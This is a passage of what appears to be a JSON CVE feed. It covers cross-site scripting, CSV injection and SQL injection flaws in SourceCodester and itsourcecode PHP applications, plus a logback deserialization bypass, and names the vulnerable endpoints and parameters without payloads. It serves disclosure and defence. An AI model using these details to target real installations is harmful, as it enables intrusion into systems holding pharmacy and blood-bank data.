SourceCodester Pharmacy Sales and Inventory System 1.0. Affected by this vulnerability is the function create_medicine_name of the file /ShowForm/create_medicine_name/main. Performing a manipulation of the argument medicine_name results in cross site scripting. The attack can be initiated remotely. The exploit is now public and may be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:N/I:P/A:N","baseScore":4.0,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"NONE","integrityImpact":"PARTIAL","availabilityImpact":"NONE"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/2","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10244","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/823931","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367522","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367522/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10245","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:23.603","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. Affected by this issue is the function create_supplier of the file /ShowForm/create_supplier/main. Executing a manipulation of the argument company_name can lead to cross site scripting. The attack can be launched remotely. The exploit has been published and may be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:N/I:P/A:N","baseScore":4.0,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"NONE","integrityImpact":"PARTIAL","availabilityImpact":"NONE"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/3","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10245","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/823937","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367523","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367523/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10246","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:23.773","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects the function create_medicine_presentation of the file /ShowForm/create_medicine_presentation/main. The manipulation of the argument medicine_presentation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:N/I:P/A:N","baseScore":4.0,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"NONE","integrityImpact":"PARTIAL","availabilityImpact":"NONE"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/4","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10246","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/823941","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367524","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367524/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10247","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:23.930","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was found in SourceCodester Pharmacy Sales and Inventory System 1.0. This vulnerability affects the function create_generic_name of the file /ShowForm/create_generic_name/main. The manipulation of the argument generic_name results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:N/I:P/A:N","baseScore":4.0,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"NONE","integrityImpact":"PARTIAL","availabilityImpact":"NONE"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/5","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10247","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/823943","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367525","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367525/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10248","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:24.090","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was determined in SourceCodester Pharmacy Sales and Inventory System up to 1.0. This issue affects the function create_supplier of the file /Export_csv/export of the component Supplier Creation Interface. This manipulation of the argument Address/Company Name causes csv injection. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"HIGH","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L","baseScore":4.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.2,"impactScore":3.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:M/C:P/I:P/A:P","baseScore":5.8,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"MULTIPLE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"MEDIUM","exploitabilityScore":6.4,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-74"},{"lang":"en","value":"CWE-1236"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/6","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10248","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/824029","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367526","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367526/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10249","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:24.260","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was identified in itsourcecode Online Blood Bank Management System 1.0. Impacted is an unknown function of the file /admin/viewrequest.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":3.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:N/C:P/I:P/A:P","baseScore":7.5,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"NONE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"HIGH","exploitabilityScore":10.0,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-74"},{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://github.com/zhengdexu-bot/zhengdexu/issues/1","source":"cna@vuldb.com"},{"url":"https://itsourcecode.com/","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10249","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/824023","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367527","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367527/cti","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10250","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:24.420","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A security flaw has been discovered in itsourcecode Online Blood Bank Management System 1.0. The affected element is an unknown function of the file /admin/campsdetails.php. Performing a manipulation of the argument hospital results in sql injection. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":3.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:N/C:P/I:P/A:P","baseScore":7.5,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"NONE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"HIGH","exploitabilityScore":10.0,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-74"},{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://github.com/zhengdexu-bot/zhengdexu/issues/2","source":"cna@vuldb.com"},{"url":"https://itsourcecode.com/","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10250","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/824047","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367528","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367528/cti","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10532","sourceIdentifier":"vulnerability@ncsc.ch","published":"2026-06-01T13:16:30.340","lastModified":"2026-06-01T13:16:30.340","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Deserialization of untrusted data vulnerability in QOS.CH Sarl logback logback-core (HardenedObjectInputStream (logback-core) modules) allows Object Injection, albeit heavily restricted.\n\nMore precisely, an attacker able to influence serialized data sent to \nSimpleSocketServer or SimpleSSLSocketServer can instantiate Proxy objects.\n\n\nAlthough deserialization is heavily restricted by HardenedObjectInputStream and no \npractical way to achieve remote code execution or significant privilege \nescalation has been identified, this issue constitutes a bypass of the \nintended security restrictions.\n\n\n\nThis issue affects logback: through 1.5.33 inclusive."}],"metrics":{"cvssMetricV40":[{"source":"vulnerability@ncsc.ch","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:M/U:Green","baseScore":2.9,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","attackRequirements":"PRESENT","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"MODERATE","providerUrgency":"GREEN"}}]},"weaknesses":[{"source":"vulnerability@ncsc.ch","type":"Secondary","description":[{"lang":"en","value":"CWE-502"}]}],"references":[{"url":"https://logback.qos.ch/news.html#1.5.34","source":"vulnerability@ncsc.ch"}]}}]}